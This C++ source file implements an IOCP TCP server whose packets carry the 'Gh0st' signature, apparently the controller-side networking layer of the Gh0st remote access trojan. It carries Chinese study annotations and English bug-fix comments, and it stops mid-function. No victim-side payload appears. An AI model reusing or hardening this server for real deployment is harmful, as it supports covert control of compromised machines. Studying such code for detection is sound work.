// IOCPServer.cpp: implementation of the CIOCPServer class.
//
//
#include "stdafx.h"
#include "IOCPServer.h"
#include "../MainFrm.h"
#include "zlib/zlib.h"
#ifdef _DEBUG
#undef THIS_FILE
static char THIS_FILE[]=__FILE__;
#define new DEBUG_NEW
#endif
// Change at your Own Peril
// 'G' 'h' '0' 's' 't' | PacketLen | UnZipLen
#define HDR_SIZE 13
#define FLAG_SIZE 5
#define HUERISTIC_VALUE 2
CRITICAL_SECTION CIOCPServer::m_cs;
//
// Construction/Destruction
//
//
// FUNCTION: CIOCPServer::CIOCPServer
//
// DESCRIPTION: C'tor initializes Winsock2 and miscelleanous events etc.
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
CIOCPServer::CIOCPServer()
{
	TRACE("CIOCPServer=%p\n",this);

	// Bring up Winsock 2.2 before any socket call is made.
	WSADATA wsaData;
	WSAStartup(MAKEWORD(2,2), &wsaData);

	// Guards the shared context lists (m_listContexts / m_listFreePool).
	InitializeCriticalSection(&m_cs);

	// Manual-reset event used to ask the listener thread to shut down.
	m_hKillEvent = CreateEvent(NULL, TRUE, FALSE, NULL);

	m_hThread         = NULL;   // listener thread handle
	m_socListen       = NULL;   // listening socket
	m_hEvent          = NULL;   // FD_ACCEPT notification event
	m_hCompletionPort = NULL;   // IOCP handle
	m_bInit           = false;  // set once Initialize() succeeds
	m_bTimeToKill     = false;  // signals worker threads to exit
	m_bDisconnectAll  = false;  // sentinel raised while dropping all clients
	m_nCurrentThreads = 0;      // workers servicing the IOCP
	m_nBusyThreads    = 0;      // workers currently processing a completion
	m_nSendKbps       = 0;      // outbound throughput sample
	m_nRecvKbps       = 0;      // inbound throughput sample
	m_nMaxConnections = 10000;  // connection cap (overridden in Initialize)
	m_nKeepLiveTime   = 1000 * 60 * 3; // keep-alive idle time: 3 minutes

	// Packet signature; must match the flag the client stamps on packets.
	const BYTE bFlag[] = {'G', 'h', '0', 's', 't'};
	memcpy(m_bPacketFlag, bFlag, sizeof(bFlag));
}
//
// FUNCTION: CIOCPServer::CIOCPServer
//
// DESCRIPTION: Tidy up
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
///析构函数中关闭完成端口,卸载套接字库的使用,跟进shutdown函数/
CIOCPServer::~CIOCPServer()
{
	// Tear down the IOCP machinery, then release Winsock. Any exception
	// is swallowed: a destructor must never throw.
	try
	{
		Shutdown();
		WSACleanup();
	}
	catch (...)
	{
	}
}
//
// FUNCTION: Init
//
// DESCRIPTION: Starts listener into motion
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
bool CIOCPServer::Initialize(NOTIFYPROC pNotifyProc, CMainFrame* pFrame, int nMaxConnections, int nPort)
{
	// Purpose: create the listening socket, register for FD_ACCEPT
	// notification, start the listener thread and set up the completion
	// port. Returns true on success; on failure the listen socket is
	// closed and false is returned.
	m_pNotifyProc = pNotifyProc;         // event callback into the UI layer
	m_pFrame = pFrame;                   // owning frame, echoed back to the callback
	m_nMaxConnections = nMaxConnections; // connection cap

	m_socListen = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, WSA_FLAG_OVERLAPPED);
	if (m_socListen == INVALID_SOCKET)
	{
		TRACE(_T("Could not create listen socket %ld\n"),WSAGetLastError());
		return false;
	}

	// Event used by the listener thread to wait for network activity.
	m_hEvent = WSACreateEvent();
	if (m_hEvent == WSA_INVALID_EVENT)
	{
		TRACE(_T("WSACreateEvent() error %ld\n"),WSAGetLastError());
		closesocket(m_socListen);
		return false;
	}

	// The listener is ONLY interested in FD_ACCEPT,
	// i.e. when a client connects to our IP/port.
	int nRet = WSAEventSelect(m_socListen,
							  m_hEvent,
							  FD_ACCEPT);
	if (nRet == SOCKET_ERROR)
	{
		TRACE(_T("WSAAsyncSelect() error %ld\n"),WSAGetLastError());
		closesocket(m_socListen);
		return false;
	}

	// Bind to the designated port on every local interface.
	SOCKADDR_IN saServer;
	saServer.sin_port = htons(nPort);
	saServer.sin_family = AF_INET;
	saServer.sin_addr.s_addr = INADDR_ANY;
	nRet = bind(m_socListen,
				(LPSOCKADDR)&saServer,
				sizeof(struct sockaddr));
	if (nRet == SOCKET_ERROR)
	{
		TRACE(_T("bind() error %ld\n"),WSAGetLastError());
		closesocket(m_socListen);
		return false;
	}

	// Set the socket to listen.
	nRet = listen(m_socListen, SOMAXCONN);
	if (nRet == SOCKET_ERROR)
	{
		TRACE(_T("listen() error %ld\n"),WSAGetLastError());
		closesocket(m_socListen);
		return false;
	}

	// Spin up the accept loop (see ListenThreadProc).
	UINT dwThreadId = 0;
	m_hThread =
		(HANDLE)_beginthreadex(NULL,            // Security
							   0,               // Stack size - use default
							   ListenThreadProc,// Thread fn entry point
							   (void*) this,
							   0,               // Init flag
							   &dwThreadId);    // Thread id

	// BUG FIX: _beginthreadex returns 0 (NULL) on failure, not
	// INVALID_HANDLE_VALUE; the old "!= INVALID_HANDLE_VALUE" test treated
	// a failed thread creation as success.
	if (m_hThread != NULL)
	{
		// BUG FIX: propagate an InitializeIOCP() failure instead of
		// unconditionally reporting success.
		if (InitializeIOCP())
		{
			m_bInit = true;
			return true;
		}
	}
	return false;
}
//
// FUNCTION: CIOCPServer::ListenThreadProc
//
// DESCRIPTION: Listens for incoming clients
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
unsigned CIOCPServer::ListenThreadProc(LPVOID lParam)
{
	// Accept loop: alternately polls the kill event and the FD_ACCEPT
	// event until shutdown is requested, handing new clients to OnAccept.
	CIOCPServer* pServer = reinterpret_cast<CIOCPServer*>(lParam);
	WSANETWORKEVENTS netEvents;

	for (;;)
	{
		// Shutdown requested? (Stop() sets m_hKillEvent.)
		if (WaitForSingleObject(pServer->m_hKillEvent, 100) == WAIT_OBJECT_0)
			break;

		// Wait up to 100 ms for network activity on the listen socket.
		DWORD dwWait = WSAWaitForMultipleEvents(1,
												&pServer->m_hEvent,
												FALSE,
												100,
												FALSE);
		if (dwWait == WSA_WAIT_TIMEOUT)
			continue;

		// Find out which network event fired (this also resets m_hEvent).
		if (WSAEnumNetworkEvents(pServer->m_socListen,
								 pServer->m_hEvent,
								 &netEvents) == SOCKET_ERROR)
		{
			TRACE(_T("WSAEnumNetworkEvents error %ld\n"),WSAGetLastError());
			break;
		}

		// A client is connecting: accept it unless the event carries an error.
		if (netEvents.lNetworkEvents & FD_ACCEPT)
		{
			if (netEvents.iErrorCode[FD_ACCEPT_BIT] != 0)
			{
				TRACE(_T("Unknown network event error %ld\n"),WSAGetLastError());
				break;
			}
			pServer->OnAccept();
		}
	}
	return 0; // normal thread exit code
}
//
// FUNCTION: CIOCPServer::OnAccept
//
// DESCRIPTION: Listens for incoming clients
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09072001 Changes for OVERLAPPEDPLUS
void CIOCPServer::OnAccept()
{
SOCKADDR_IN SockAddr;//定义SOCKADDR_IN结构对象
SOCKET clientSocket;//定义一个clientSocket套接字
int nRet;
int nLen;
if (m_bTimeToKill || m_bDisconnectAll)//如果要结束掉完成端口上所有的线程或者断开所有连接时,此函数退出
return;
//
// accept the new socket descriptor
//检测到有主机连接时调用accept并建立与之通信的套接字
nLen = sizeof(SOCKADDR_IN);
clientSocket = accept(m_socListen,
(LPSOCKADDR)&SockAddr,
&nLen);
if (clientSocket == SOCKET_ERROR)//接收失败
{
nRet = WSAGetLastError();//获取错误代码
if (nRet != WSAEWOULDBLOCK)//不等于WSAEWOULDBLOCK真的发生错误
{
//
// Just log the error and return
//
TRACE(_T("accept() error\n"),WSAGetLastError());
return;
}
}
// Create the Client context to be associted with the completion port
//定义一个指向ClientContext结构的指针,并调用函数进行赋值,我们跟进此函数!
ClientContext* pContext = AllocateContext();
// AllocateContext fail
if (pContext == NULL)//创建失败
return;
//将连接的套接字保存在上下文中
pContext->m_Socket = clientSocket;
// Fix up In Buffer
//对结构中接收的缓冲区赋值大小为8192
pContext->m_wsaInBuffer.buf = (char*)pContext->m_byInBuffer;
pContext->m_wsaInBuffer.len = sizeof(pContext->m_byInBuffer);
// Associate the new socket with a completion port.
//判断完成端口是否绑定成功
if (!AssociateSocketWithCompletionPort(clientSocket, m_hCompletionPort, (DWORD) pContext))//关联失败
{
//失败时删除这个指针并置为空,关闭连接用的套接字。关闭监听套接字,并返回
delete pContext;
pContext = NULL;
closesocket( clientSocket );
closesocket( m_socListen );
return;
}
// 关闭nagle算法,以免影响性能,因为控制时控制端要发送很多数据量很小的数据包,要求马上发送
// 暂不关闭,实验得知能网络整体性能有很大影响
const char chOpt = 1;
// int nErr = setsockopt(pContext->m_Socket, IPPROTO_TCP, TCP_NODELAY, &chOpt, sizeof(char));
// if (nErr == -1)
// {
// TRACE(_T("setsockopt() error\n"),WSAGetLastError());
// return;
// }
// Set KeepAlive 开启保活机制
//对于 socket 非正常断开
//设置套接字的属性,并赋予它保活机制,如果设置错误获取错误代码
if (setsockopt(pContext->m_Socket, SOL_SOCKET, SO_KEEPALIVE, (char *)&chOpt, sizeof(chOpt)) != 0)//发生错误
{
TRACE(_T("setsockopt() error\n"), WSAGetLastError());
}
// 设置超时详细信息
tcp_keepalive klive;
klive.onoff = 1; // 启用保活
klive.keepalivetime = m_nKeepLiveTime; // 开始首次 KeepAlive 探测前的 TCP 空闭时间 3分钟一次
klive.keepaliveinterval = 1000 * 10; // 重试间隔为10秒 Resend if No-Reply
WSAIoctl
(
pContext->m_Socket,
SIO_KEEPALIVE_VALS,
&klive,
sizeof(tcp_keepalive),
NULL,
0,
(unsigned long *)&chOpt,
0,
NULL
);
CLock cs(m_cs, "OnAccept" );;//加入链表之前要进行共享资源访问的控制在此调用CLock类
// Hold a reference to the context
m_listContexts.AddTail(pContext);//把上下文加入上下文列表,每有一个连接就建立一个上下文并加入列表
// Trigger first IO Completion Request
// Otherwise the Worker thread will remain blocked waiting for GetQueuedCompletionStatus...
// The first message that gets queued up is ClientIoInitializing - see ThreadPoolFunc and
// IO_MESSAGE_HANDLER
//动态新建一个OVERLAPPEDPLUS结构并初始化IOType类型为IOInitialize
OVERLAPPEDPLUS *pOverlap = new OVERLAPPEDPLUS(IOInitialize);
//向一个已经初始完的I/O端口发送数据包操作类型为IOInitialize,触发GetQueuedCompletionStatus功能调用函数来取得数据包
BOOL bSuccess = PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) pContext, &pOverlap->m_ol);
if ( (!bSuccess && GetLastError( ) != ERROR_IO_PENDING))//发送失败
{
RemoveStaleClient(pContext,TRUE);
return;
}
//我们看一下NC_CLIENT_CONNECT实现了什么都没做
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_CONNECT);//调用回调函数发送NC_CLINET_CONECT这个参数,跟踪得知什么都没做
// Post to WSARecv Next
PostRecv(pContext);//抛出接受的请求,跟进函数
}
//
// FUNCTION: CIOCPServer::InitializeIOCP
//
// DESCRIPTION: Create a dummy socket and associate a completion port with it.
// once completion port is create we can dicard the socket
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
bool CIOCPServer::InitializeIOCP(void)
{
	// Creates the completion port and launches the worker-thread pool.
	SOCKET        s;
	DWORD         i;
	UINT          nThreadID;
	SYSTEM_INFO   systemInfo;

	// Open a throw-away overlapped socket purely so we have a file handle
	// to pass to CreateIoCompletionPort (required on older NT versions;
	// newer ones accept a NULL FileHandle).
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
	if ( s == INVALID_SOCKET )
		return false;

	// Create the completion port shared by every worker thread.
	m_hCompletionPort = CreateIoCompletionPort( (HANDLE)s, NULL, 0, 0 );
	if ( m_hCompletionPort == NULL )
	{
		closesocket( s );
		return false;
	}

	// The bootstrap socket has served its purpose.
	closesocket( s );

	// Size the pool from the processor count.
	GetSystemInfo( &systemInfo );
	m_nThreadPoolMin  = systemInfo.dwNumberOfProcessors * HUERISTIC_VALUE;
	m_nThreadPoolMax  = m_nThreadPoolMin;
	m_nCPULoThreshold = 10;  // pool may shrink below this CPU usage
	m_nCPUHiThreshold = 75;  // pool could grow above this CPU usage

	m_cpu.Init(); // start sampling CPU usage

	// Two worker threads per processor: enough parallelism to keep the
	// port busy without excessive context switching.
	UINT nWorkerCnt = systemInfo.dwNumberOfProcessors * HUERISTIC_VALUE;

	HANDLE hWorker;
	m_nWorkerCnt = 0;
	for ( i = 0; i < nWorkerCnt; i++ )
	{
		hWorker = (HANDLE)_beginthreadex(NULL,           // Security
										 0,              // Stack size - use default
										 ThreadPoolFunc, // Thread fn entry point
										 (void*) this,   // Param for thread
										 0,              // Init flag
										 &nThreadID);    // Thread id
		if (hWorker == NULL )
		{
			CloseHandle( m_hCompletionPort );
			return false;
		}
		m_nWorkerCnt++;       // live-worker count, drained by CloseCompletionPort
		CloseHandle(hWorker); // we never join the worker; drop our reference
	}
	return true;
}
//
// FUNCTION: CIOCPServer::ThreadPoolFunc
//
// DESCRIPTION: This is the main worker routine for the worker threads.
// Worker threads wait on a completion port for I/O to complete.
// When it completes, the worker thread processes the I/O, then either pends
// new I/O or closes the client's connection. When the service shuts
// down, other code closes the completion port which causes
// GetQueuedCompletionStatus() to wake up and the worker thread then
// exits.
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
unsigned CIOCPServer::ThreadPoolFunc (LPVOID thisContext) // worker-thread entry point
{
	// Worker loop for the completion port: blocks in
	// GetQueuedCompletionStatus, dispatches each dequeued packet to
	// ProcessIOMessage, and exits when the pool shrinks (bStayInPool)
	// or the server shuts down (m_bTimeToKill).
	// Get back our pointer to the class
	ULONG ulFlags = MSG_PARTIAL; // NOTE(review): unused in this function
	CIOCPServer* pThis = reinterpret_cast<CIOCPServer*>(thisContext);
	ASSERT(pThis);
	HANDLE hCompletionPort = pThis->m_hCompletionPort;
	DWORD dwIoSize;                 // bytes transferred for this completion
	LPOVERLAPPED lpOverlapped;      // raw OVERLAPPED from the port
	ClientContext* lpClientContext; // completion key = per-client context
	OVERLAPPEDPLUS* pOverlapPlus;   // enclosing record carrying the IO type
	bool bError;
	bool bEnterRead;                // NOTE(review): set but never used
	InterlockedIncrement(&pThis->m_nCurrentThreads); // thread-pool bookkeeping
	InterlockedIncrement(&pThis->m_nBusyThreads);
	//
	// Loop round and round servicing I/O completions.
	// Leaves only when bStayInPool goes FALSE or m_bTimeToKill goes true.
	for (BOOL bStayInPool = TRUE; bStayInPool && pThis->m_bTimeToKill == false; )
	{
		pOverlapPlus = NULL;
		lpClientContext = NULL;
		bError = false;
		bEnterRead = false;
		// Thread is about to block waiting for IO completion.
		InterlockedDecrement(&pThis->m_nBusyThreads);
		// Get a completed IO request.
		BOOL bIORet = GetQueuedCompletionStatus(
			hCompletionPort,
			&dwIoSize,
			(LPDWORD) &lpClientContext,
			&lpOverlapped, INFINITE);
		DWORD dwIOError = GetLastError();
		// Recover the full OVERLAPPEDPLUS record (IO type + OVERLAPPED) from
		// the embedded m_ol member.
		// NOTE(review): if GetQueuedCompletionStatus failed without dequeuing
		// a packet, lpOverlapped is NULL and this yields a bogus pointer; the
		// code below only dereferences pOverlapPlus after checking bIORet, but
		// confirm no path touches it on the failure branch.
		pOverlapPlus = CONTAINING_RECORD(lpOverlapped, OVERLAPPEDPLUS, m_ol);
		int nBusyThreads = InterlockedIncrement(&pThis->m_nBusyThreads);
		if (!bIORet && dwIOError != WAIT_TIMEOUT )
		{
			// A completion failed (client died, cancelled IO, ...): drop the
			// client unless we're already shutting down.
			if (lpClientContext && pThis->m_bTimeToKill == false)
			{
				pThis->RemoveStaleClient(lpClientContext, FALSE);
			}
			continue;
			// NOTE(review): unreachable - the continue above skips this, and
			// the `continue` path also never deletes pOverlapPlus (leak when a
			// packet WAS dequeued with an error status).
			// anyway, this was an error and we should exit
			bError = true;
		}
		if (!bError)
		{
			// Pool growth heuristic: if every worker is busy, the pool is not
			// at its cap, and CPU usage is above the high threshold, a new
			// worker could be spawned (spawn code is disabled below).
			if (nBusyThreads == pThis->m_nCurrentThreads)
			{
				if (nBusyThreads < pThis->m_nThreadPoolMax)
				{
					if (pThis->m_cpu.GetUsage() > pThis->m_nCPUHiThreshold)
					{
						UINT nThreadID = -1;
						// Spawning disabled by the original author:
						//	HANDLE hThread = (HANDLE)_beginthreadex(NULL,				// Security
						//							 0,					// Stack size - use default
						//							 ThreadPoolFunc,	// Thread fn entry point
						///							 (void*) pThis,
						//							 0,					// Init flag
						//							 &nThreadID);		// Thread address
						//	CloseHandle(hThread);
					}
				}
			}
			// Thread timed out - IDLE?
			if (!bIORet && dwIOError == WAIT_TIMEOUT)
			{
				if (lpClientContext == NULL)
				{
					// Pool shrink heuristic: with CPU usage below the low
					// threshold and more threads than the minimum, let this
					// worker retire.
					if (pThis->m_cpu.GetUsage() < pThis->m_nCPULoThreshold)
					{
						// Thread has no outstanding IO - Server hasn't much to do so die
						if (pThis->m_nCurrentThreads > pThis->m_nThreadPoolMin)
							bStayInPool =  FALSE;
					}
					bError = true;
				}
			}
		}
		//
		// Dispatch: a real completion with a valid record and context goes to
		// the per-IO-type handler (OnClientInitializing/Reading/Writing).
		if (!bError)
		{
			if(bIORet && NULL != pOverlapPlus && NULL != lpClientContext)
			{
				try
				{
					pThis->ProcessIOMessage(pOverlapPlus->m_ioType, lpClientContext, dwIoSize);
				}
				catch (...) {}
			}
		}
		// Free the per-IO record allocated by the poster (PostRecv/Send/OnAccept).
		if(pOverlapPlus)
			delete pOverlapPlus; // from previous call
	}
	InterlockedDecrement(&pThis->m_nWorkerCnt);
	InterlockedDecrement(&pThis->m_nCurrentThreads);
	InterlockedDecrement(&pThis->m_nBusyThreads);
	return 0; // normal thread exit
}
//
// FUNCTION: CIOCPServer::Stop
//
// DESCRIPTION: Signal the listener to quit his thread
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::Stop()
{
	// Ask the listener thread to quit, wait for it to finish, then release
	// both the thread handle and the kill event.
	::SetEvent(m_hKillEvent);
	WaitForSingleObject(m_hThread, INFINITE);
	CloseHandle(m_hThread);
	CloseHandle(m_hKillEvent);
}
//
// FUNCTION: CIOCPServer::GetHostName
//
// DESCRIPTION: Get the host name of the connect client
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Returns the peer IP address of the given connected socket.
CString CIOCPServer::GetHostName(SOCKET socket)
{
	// Returns the peer's dotted-quad IP address for a connected socket,
	// or an empty string on failure.
	sockaddr_in  sockAddr;
	memset(&sockAddr, 0, sizeof(sockAddr));
	int nSockAddrLen = sizeof(sockAddr);
	// BUG FIX: getpeername() returns 0 on success and SOCKET_ERROR (-1) on
	// failure; the old code compared the int result against INVALID_SOCKET
	// (an unsigned SOCKET value), which only worked through accidental
	// integer conversion. Test for success explicitly.
	int nRet = getpeername(socket, (SOCKADDR*)&sockAddr, &nSockAddrLen);
	return nRet == 0 ? inet_ntoa(sockAddr.sin_addr) : "";
}
void CIOCPServer::PostRecv(ClientContext* pContext)
{
	// Queue one overlapped read on the client's socket; the completion
	// arrives in ThreadPoolFunc as an IORead packet.
	OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IORead);
	ULONG ulFlags = MSG_PARTIAL;
	DWORD dwBytes;
	UINT nRet = WSARecv(pContext->m_Socket,
						&pContext->m_wsaInBuffer,
						1,
						&dwBytes,
						&ulFlags,
						&pOverlap->m_ol,
						NULL);
	// Anything other than "pending" means the connection is unusable:
	// drop the client with a hard close (second argument FALSE).
	if ( nRet == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING)
	{
		RemoveStaleClient(pContext, FALSE);
	}
}
//
// FUNCTION: CIOCPServer::Send
//
// DESCRIPTION: Posts a Write + Data to IO CompletionPort for transfer
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
///首先,待发送的数据是在参数:lpData中,而待发送的数据的大小由参数:nSize指定。/
void CIOCPServer::Send(ClientContext* pContext, LPBYTE lpData, UINT nSize)
{
	// Compresses lpData (nSize bytes) and frames it as
	//   [5-byte 'Gh0st' flag][4-byte total packet len][4-byte raw len][zlib payload]
	// in the context's write buffer, keeps an uncompressed backup for
	// peer-requested retransmission, then posts an IOWrite completion so
	// a worker thread performs the actual WSASend (see OnClientWriting).
	// Calling with nSize == 0 queues just the flag bytes, which the peer
	// interprets as a "resend your last packet" request.
	if (pContext == NULL)
		return;
	try
	{
		if (nSize > 0)
		{
			// Worst-case compressed size per the zlib manual:
			// sourceLen * 1.001 + 12 bytes of slack.
			unsigned long destLen = (double)nSize * 1.001 + 12;
			LPBYTE pCompressed = new BYTE[destLen];
			// On success, destLen is updated to the actual compressed size.
			int nZRet = compress(pCompressed, &destLen, lpData, nSize);
			if (nZRet != Z_OK)
			{
				delete [] pCompressed;
				return;
			}

			// Frame: flag + total length + uncompressed length + payload.
			LONG nBufLen = destLen + HDR_SIZE;
			// 5 bytes packet flag
			pContext->m_WriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
			// 4 byte header [Size of Entire Packet]
			pContext->m_WriteBuffer.Write((PBYTE) &nBufLen, sizeof(nBufLen));
			// 4 byte header [Size of UnCompress Entire Packet]
			pContext->m_WriteBuffer.Write((PBYTE) &nSize, sizeof(nSize));
			// Write Data
			pContext->m_WriteBuffer.Write(pCompressed, destLen);
			delete [] pCompressed;

			// Back up the uncompressed payload for retransmission. The copy
			// through a temporary is deliberate: lpData may point INTO
			// m_ResendWriteBuffer itself (the resend path in OnClientReading
			// passes its buffer), so we must snapshot it before ClearBuffer.
			LPBYTE pBackup = new BYTE[nSize];
			CopyMemory(pBackup, lpData, nSize);
			pContext->m_ResendWriteBuffer.ClearBuffer();
			pContext->m_ResendWriteBuffer.Write(pBackup, nSize);
			delete [] pBackup;
		}
		else // resend request
		{
			// The peer hit a receive error: queue only the flag bytes, which
			// tell the other side to retransmit its backed-up packet.
			pContext->m_WriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
			pContext->m_ResendWriteBuffer.ClearBuffer();
			pContext->m_ResendWriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
		}

		// Block until the previous send has fully drained.
		WaitForSingleObject(pContext->m_hWriteComplete, INFINITE);

		// Hand the write off to the IOCP workers. The zero byte count tells
		// OnClientWriting this is a fresh buffer, not a partial completion.
		OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IOWrite);
		PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) pContext, &pOverlap->m_ol);
		pContext->m_nMsgOut++;
	}catch(...){}
}
//
// FUNCTION: CClientListener::OnClientInitializing
//
// DESCRIPTION: Called when client is initailizing
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
///从此函数可以看出初始化连接的时候什么都没做直接返回true/
bool CIOCPServer::OnClientInitializing(ClientContext* pContext, DWORD dwIoSize)
{
	// Hook for per-connection setup (e.g. a greeting packet). Nothing is
	// done today; returning true tells the dispatcher to keep reading.
	return true;
}
//
// FUNCTION: CIOCPServer::OnClientReading
//
// DESCRIPTION: Called when client is reading
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
bool CIOCPServer::OnClientReading(ClientContext* pContext, DWORD dwIoSize)
{
	// Handles an IORead completion: updates the receive-rate counter,
	// buffers the incoming bytes, and extracts/uncompresses every complete
	// framed packet ([5-byte flag][4-byte total len][4-byte raw len][zlib]).
	// On any framing error the stream is discarded and the peer is asked
	// to retransmit.
	CLock cs(CIOCPServer::m_cs, "OnClientReading");
	try
	{
		// Throughput sampling: the function-local statics accumulate bytes
		// across calls and refresh m_nRecvKbps roughly once per second.
		static DWORD nLastTick = GetTickCount();
		static DWORD nBytes = 0;
		nBytes += dwIoSize;
		if (GetTickCount() - nLastTick >= 1000)
		{
			nLastTick = GetTickCount();
			InterlockedExchange((LPLONG)&(m_nRecvKbps), nBytes);
			nBytes = 0;
		}

		// Zero bytes means the peer closed or the transfer failed:
		// drop this client so it can reconnect.
		if (dwIoSize == 0)
		{
			RemoveStaleClient(pContext, FALSE);
			return false;
		}

		// A bare 5-byte flag packet is the peer asking us to retransmit the
		// last packet we sent (it hit a receive error on its side).
		if (dwIoSize == FLAG_SIZE && memcmp(pContext->m_byInBuffer, m_bPacketFlag, FLAG_SIZE) == 0)
		{
			// Replay the backed-up payload.
			Send(pContext, pContext->m_ResendWriteBuffer.GetBuffer(), pContext->m_ResendWriteBuffer.GetBufferLen());
			// Must re-arm the overlapped read.
			PostRecv(pContext);
			return true;
		}

		// Append this chunk; the stream may hold a partial packet, one
		// packet, or several packets plus a partial one.
		pContext->m_CompressionBuffer.Write(pContext->m_byInBuffer,dwIoSize);
		m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_RECEIVE);

		// Drain every complete packet currently buffered.
		while (pContext->m_CompressionBuffer.GetBufferLen() > HDR_SIZE)
		{
			// Validate the leading packet signature.
			BYTE bPacketFlag[FLAG_SIZE];
			CopyMemory(bPacketFlag, pContext->m_CompressionBuffer.GetBuffer(), sizeof(bPacketFlag));
			if (memcmp(m_bPacketFlag, bPacketFlag, sizeof(m_bPacketFlag)) != 0)
				throw "bad buffer";

			// Peek the total packet length that follows the flag.
			int nSize = 0;
			CopyMemory(&nSize, pContext->m_CompressionBuffer.GetBuffer(FLAG_SIZE), sizeof(int));

			// BUG FIX: nSize comes straight off the wire. A value of zero
			// caused a divide-by-zero below, and a value below HDR_SIZE made
			// nCompressLength negative (huge allocation). Reject malformed
			// lengths through the existing resend path instead of crashing.
			if (nSize <= HDR_SIZE)
				throw "bad length";

			// Update the transfer-progress percentage for the UI.
			pContext->m_nTransferProgress = pContext->m_CompressionBuffer.GetBufferLen() * 100 / nSize;

			// Only proceed once the whole packet has arrived.
			if (nSize && (pContext->m_CompressionBuffer.GetBufferLen()) >= nSize)
			{
				int nUnCompressLength = 0;
				// Consume the header: flag, total length, uncompressed length.
				pContext->m_CompressionBuffer.Read((PBYTE) bPacketFlag, sizeof(bPacketFlag));
				pContext->m_CompressionBuffer.Read((PBYTE) &nSize, sizeof(int));
				pContext->m_CompressionBuffer.Read((PBYTE) &nUnCompressLength, sizeof(int));

				// BUG FIX (hardening): the uncompressed length is also
				// attacker-controlled; reject a negative value before using
				// it as an allocation size.
				if (nUnCompressLength < 0)
					throw "bad length";

				// Inflate the payload into the decompression buffer.
				int nCompressLength = nSize - HDR_SIZE;
				PBYTE pData = new BYTE[nCompressLength];
				PBYTE pDeCompressionData = new BYTE[nUnCompressLength];
				if (pData == NULL || pDeCompressionData == NULL)
					throw "bad Allocate";
				pContext->m_CompressionBuffer.Read(pData, nCompressLength);

				unsigned long destLen = nUnCompressLength;
				int nRet = uncompress(pDeCompressionData, &destLen, pData, nCompressLength);
				if (nRet == Z_OK)
				{
					pContext->m_DeCompressionBuffer.ClearBuffer();
					pContext->m_DeCompressionBuffer.Write(pDeCompressionData, destLen);
					m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_RECEIVE_COMPLETE);
				}
				else
				{
					// BUG FIX: free the work buffers before throwing; the old
					// code leaked both on a failed uncompress.
					delete [] pData;
					delete [] pDeCompressionData;
					throw "bad buffer";
				}
				delete [] pData;
				delete [] pDeCompressionData;
				pContext->m_nMsgIn++;
			}
			else
				break; // wait for the rest of the packet
		}
		// Re-arm the next overlapped read.
		PostRecv(pContext);
	}catch(...)
	{
		// Framing error: discard the partial stream and ask the peer to
		// retransmit (Send with nSize == 0 emits just the packet flag).
		pContext->m_CompressionBuffer.ClearBuffer();
		Send(pContext, NULL, 0);
		PostRecv(pContext);
	}
	return true;
}
//
// FUNCTION: CIOCPServer::OnClientWriting
//
// DESCRIPTION: Called when client is writing
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
bool CIOCPServer::OnClientWriting(ClientContext* pContext, DWORD dwIoSize)
{
	// Handles an IOWrite completion: consumes dwIoSize already-sent bytes
	// from the write buffer; if data remains, issues the next overlapped
	// WSASend, otherwise signals m_hWriteComplete so Send() may queue the
	// next packet. For the initial packet posted by Send(), dwIoSize is 0,
	// so nothing is consumed and the first WSASend goes out here.
	try
	{
		// Throughput sampling: function-local statics accumulate sent bytes
		// across calls and refresh m_nSendKbps roughly once per second.
		static DWORD nLastTick = GetTickCount();
		static DWORD nBytes = 0;
		nBytes += dwIoSize;
		if (GetTickCount() - nLastTick >= 1000)
		{
			nLastTick = GetTickCount();
			InterlockedExchange((LPLONG)&(m_nSendKbps), nBytes);
			nBytes = 0;
		}
		//
		ULONG ulFlags = MSG_PARTIAL;

		// Drop the bytes the last WSASend completed.
